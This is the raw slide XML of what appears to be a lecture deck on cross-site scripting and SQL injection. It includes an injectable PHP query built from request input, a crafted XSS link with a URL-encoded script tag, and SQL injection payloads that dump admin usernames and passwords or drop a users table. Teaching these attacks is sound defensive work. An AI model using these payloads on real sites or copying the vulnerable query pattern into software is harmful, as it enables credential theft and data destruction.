        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="5071680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="9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passive (you need the admin or other user to click on a pre-created link/button)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="749"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="9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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;input class="inputText" type="text" name= "email" value=“gudasergey@gmail.com" /&gt;</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2F67F98F-A8AF-4A09-8FCC-956B8F97E29B}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4444560" y="3352799"/>
            <a:ext cx="254916" cy="24387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8" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="20116" r="73419" b="49691"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="2273525" y="2351087"/>
            <a:ext cx="4743172" cy="30305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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357120" y="1719360"/>
            <a:ext cx="8229240" cy="513828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We want to get:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> &lt;input class="inputText" type="text" name= "email" value=“”&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;script&gt;         &lt;/script&gt;</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Making a link (for POST request you can also make an html form with hidden inputs):</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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.ru/login.php?email=”&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;script&gt;         &lt;/script&gt;”</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Better: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.ru/login.php?email= %22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%3e%3c%73%63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> …</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BEB83A61-FE32-4B4D-A7BA-25D5380E76F5}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="2365374" y="2611369"/>
            <a:ext cx="636624" cy="674754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="2365374" y="4595834"/>
            <a:ext cx="684249" cy="674664"/>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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="32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0708ED6C-1721-4A8F-8A2E-BEFE4668C131}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928800" y="1447920"/>
            <a:ext cx="7357680" cy="523044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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>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9682EC2C-8D2C-4DCB-B147-CB08D5A3B80B}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428760" y="1500120"/>
            <a:ext cx="8424360" cy="535752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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>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6AEC1C01-75A6-4519-B27C-FBBD9AAA5A54}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="31680" y="1500120"/>
            <a:ext cx="9111960" cy="51336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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357120" y="1500120"/>
            <a:ext cx="8329320" cy="5000400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>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Example – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>news display script:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> http://site.com/showNews.php?id=5 </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> $res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> id_news, header, body, author </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> news </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> id_news = " . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>['id']);</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Embedding it in the request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>code:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://site.com/showNews.php?id=-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="28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CC8964DC-6DFA-4AE5-8F42-2A79B3DE1582}"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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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798D2890-133B-4C5B-AEB2-2A4DBDF20AF4}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="725400" y="1454040"/>
            <a:ext cx="7918200" cy="504648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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1428840"/>
            <a:ext cx="9143640" cy="5214600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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arn-CL" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DROP TABLE `users`</a:t>
            </a:r>
            <a:r>
